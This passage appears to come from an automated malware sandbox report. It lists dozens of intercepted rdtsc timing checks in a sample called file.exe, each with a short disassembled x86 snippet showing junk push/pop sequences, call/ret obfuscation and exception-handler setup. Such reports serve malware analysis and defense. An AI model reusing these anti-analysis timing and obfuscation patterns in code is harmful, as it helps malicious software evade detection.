    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A805 second address: D8A80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A96A second address: D8A972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B055 second address: D8B059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B059 second address: D8B05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B05F second address: D8B069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B069 second address: D8B06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B06F second address: D8B073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B073 second address: D8B077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B1EB second address: D8B1F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F9F24D1BA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B327 second address: D8B32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B467 second address: D8B46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B729 second address: D8B733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F2573ED16h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B733 second address: D8B743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F9F24D1BA78h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B743 second address: D8B749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F76F second address: D8F784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 js 00007F9F24D1BA84h 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F9F24D1BA76h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FBFD second address: D8FC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FC03 second address: D8FC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FF60 second address: D8FF65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90F89 second address: D90F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90F8F second address: D90F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F2573ED16h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90F9A second address: D90FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59471 second address: D59486 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F2573ED16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F9F2573ED16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59486 second address: D5948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99335 second address: D99349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED20h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99349 second address: D9934E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99AF1 second address: D99AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99BEE second address: D99C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jbe 00007F9F24D1BA76h 0x00000013 pop ebx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A129 second address: D9A12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AA2D second address: D9AA33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B2F8 second address: D9B2FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D81C second address: D9D896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 pushad 0x00000009 mov dword ptr [ebp+122D2900h], esi 0x0000000f and ebx, 284FCC10h 0x00000015 popad 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F9F24D1BA78h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F9F24D1BA78h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D20C7h], eax 0x00000054 xchg eax, ebx 0x00000055 jne 00007F9F24D1BA7Eh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f je 00007F9F24D1BA76h 0x00000065 pop eax 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D896 second address: D9D89B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E2CE second address: D9E2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F4DD second address: D9F4E7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F2573ED16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA021F second address: DA0233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F24D1BA7Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55E41 second address: D55E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA78A5 second address: DA78AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA879F second address: DA87B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A0B second address: DA7A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA87B8 second address: DA87BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A0F second address: DA7A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A19 second address: DA7A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9854 second address: DA9858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8990 second address: DA8A30 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F2573ED1Ch 0x00000008 jng 00007F9F2573ED16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov bx, di 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F9F2573ED18h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov bl, ah 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F9F2573ED18h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D20C7h], ebx 0x0000005e mov eax, dword ptr [ebp+122D0039h] 0x00000064 pushad 0x00000065 mov di, si 0x00000068 mov ebx, dword ptr [ebp+122D35EAh] 0x0000006e popad 0x0000006f push FFFFFFFFh 0x00000071 jmp 00007F9F2573ED28h 0x00000076 push eax 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9A2F second address: DA9A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9A34 second address: DA9A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DABA26 second address: DABA59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F9F24D1BA76h 0x0000000d jmp 00007F9F24D1BA89h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F9F24D1BA76h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9A39 second address: DA9A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DABA59 second address: DABA5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADB1F second address: DADB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jp 00007F9F2573ED22h 0x0000000d pop esi 0x0000000e jnp 00007F9F2573ED47h 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F9F2573ED16h 0x0000001c jmp 00007F9F2573ED21h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DABC20 second address: DABC2A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADB58 second address: DADB5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE132 second address: DAE140 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE140 second address: DAE144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE144 second address: DAE1C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cmc 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F9F24D1BA78h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov bh, 51h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F9F24D1BA78h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jng 00007F9F24D1BA76h 0x00000053 jmp 00007F9F24D1BA85h 0x00000058 popad 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAE3C4 second address: DAE3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB40C6 second address: DB40CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB40CA second address: DB40D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB40D0 second address: DB414B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F24D1BA8Fh 0x00000008 jmp 00007F9F24D1BA89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F9F24D1BA85h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F9F24D1BA78h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 js 00007F9F24D1BA7Ch 0x00000036 and edi, 5BDAA43Bh 0x0000003c push 00000000h 0x0000003e mov edi, dword ptr [ebp+122D3642h] 0x00000044 push 00000000h 0x00000046 cmc 0x00000047 xchg eax, esi 0x00000048 push ebx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB414B second address: DB4169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED22h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB014E second address: DB0153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB328D second address: DB330D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F2573ED16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9F2573ED24h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edi, dword ptr [ebp+122D345Eh] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 adc ebx, 6AE070F1h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov edi, dword ptr [ebp+122D355Ah] 0x00000033 mov eax, dword ptr [ebp+122D1659h] 0x00000039 mov dword ptr [ebp+122D197Dh], edi 0x0000003f mov dword ptr [ebp+122D1B9Ch], ecx 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F9F2573ED18h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 sbb di, 4923h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0153 second address: DB0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB330D second address: DB3314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0159 second address: DB015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3314 second address: DB331A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB015D second address: DB0192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F24D1BA85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9F24D1BA85h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0192 second address: DB0198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0198 second address: DB019E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB019E second address: DB01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB53C9 second address: DB53D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9F24D1BA76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB53D3 second address: DB53D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB71AA second address: DB720E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F24D1BA7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F9F24D1BA78h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2532h], ecx 0x0000002c push 00000000h 0x0000002e mov edi, 6D93C439h 0x00000033 push 00000000h 0x00000035 je 00007F9F24D1BA86h 0x0000003b jmp 00007F9F24D1BA80h 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jns 00007F9F24D1BA76h 0x0000004a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB720E second address: DB7218 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7218 second address: DB721C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEB59 second address: DBEB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D71E second address: D4D728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9F24D1BA76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D728 second address: D4D740 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9F2573ED16h 0x00000008 jmp 00007F9F2573ED1Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D740 second address: D4D754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F24D1BA7Fh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D754 second address: D4D772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED28h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D772 second address: D4D776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D776 second address: D4D79D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9F2573ED26h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D79D second address: D4D7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9F24D1BA76h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007F9F24D1BA76h 0x00000014 jmp 00007F9F24D1BA83h 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D7C5 second address: D4D7E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F2573ED29h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE324 second address: DBE328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE4A9 second address: DBE4AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE4AF second address: DBE4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE4B3 second address: DBE4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE62C second address: DBE643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F9F24D1BA80h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE643 second address: DBE659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED20h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC37FF second address: DC3805 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
